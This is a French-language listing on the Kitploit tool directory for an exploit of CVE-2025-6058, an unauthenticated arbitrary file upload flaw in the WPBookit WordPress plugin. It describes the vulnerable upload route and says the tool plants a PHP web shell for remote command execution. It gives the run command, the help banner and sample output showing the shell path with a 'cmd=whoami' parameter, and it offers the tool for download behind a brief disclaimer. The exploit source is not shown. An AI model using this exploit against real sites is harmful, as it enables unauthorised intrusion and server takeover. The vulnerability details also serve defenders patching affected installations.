Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6058 — WPBookit <= 1.0.4 - Upload de fichier arbitraire non authentifié | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-6058
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-6058

CVE-2025-6058

WPBookit <= 1.0.4 - Upload de fichier arbitraire non authentifié

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚡ WPBookit <= 1.0.4 - Téléchargement arbitraire de fichiers sans authentification


📝 Description

Le plugin WPBookit pour WordPress est vulnérable au téléchargement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans la fonction image_upload_handle(), qui est accrochée via la route add_booking_type dans toutes les versions jusqu'à la 1.0.4 incluse.
Cette faille permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur du site affecté, pouvant conduire à une exécution de code à distance.

CVEScore CVSSDate de publicationDernière mise à jour
CVE-2025-60589.8 (Critical)July 11, 2025July 12, 2025

🚀 Que fait cet exploit ?

Cet exploit automatise le processus de :

  • Détecter si la cible exécute une version vulnérable de WPBookit (<= 1.0.4)
  • Télécharger un shell PHP en utilisant la route vulnérable, sans authentification
  • Confirmer le téléchargement du shell et fournir son chemin exact pour l'exécution de commandes à distance

🛠️ Utilisation

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🖥️ Exemple

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🆘 Exemple d'aide et de bannière

root@kitploit:~
python CVE-2025-6058.py -help

  ______   __     __  ________       ______    ______    ______   _______            ______    ______   _______    ______  
 /      \ /  |   /  |/        |     /      \  /      \  /      \ /       |          /      \  /      \ /       |  /      \ 
/$$$$$$  |$$ |   $$ |$$$$$$$$/     /$$$$$$  |/$$$$$$  |/$$$$$$  |$$$$$$$/          /$$$$$$  |/$$$$$$  |$$$$$$$/  /$$$$$$  |
$$ |  $$/ $$ |   $$ |$$ |__  ______$$____$$ |$$$  \$$ |$$____$$ |$$ |____   ______ $$ \__$$/ $$$  \$$ |$$ |____  $$ \__$$ |
$$ |      $$  \ /$$/ $$    |/      |/    $$/ $$$$  $$ | /    $$/ $$      \ /      |$$      \ $$$$  $$ |$$      \ $$    $$< 
$$ |   __  $$  /$$/  $$$$$/ $$$$$$//$$$$$$/  $$ $$ $$ |/$$$$$$/  $$$$$$$  |$$$$$$/ $$$$$$$  |$$ $$ $$ |$$$$$$$  | $$$$$$  |
$$ \__/  |  $$ $$/   $$ |_____     $$ |_____ $$ \$$$$ |$$ |_____ /  \__$$ |        $$ \__$$ |$$ \$$$$ |/  \__$$ |$$ \__$$ |
$$    $$/    $$$/    $$       |    $$       |$$   $$$/ $$       |$$    $$/         $$    $$/ $$   $$$/ $$    $$/ $$    $$/ 
 $$$$$$/      $/     $$$$$$$$/     $$$$$$$$/  $$$$$$/  $$$$$$$$/  $$$$$$/           $$$$$$/   $$$$$$/   $$$$$$/   $$$$$$/  
                                                                                                                           
                                                                                                                           
                                                                                                                           

Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

usage: CVE-2025-6058.py [-h] -u URL

CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com/wordpress

📤 Sortie

root@kitploit:~
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

⚠️ Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
L'auteur n'est pas responsable de toute utilisation abusive ou non autorisée.
Utilisez-le à vos propres risques et assurez-vous toujours d'avoir l'autorisation de tester le système cible.


Par : Khaled Alenazi (Nxploited)

Télécharger l’outil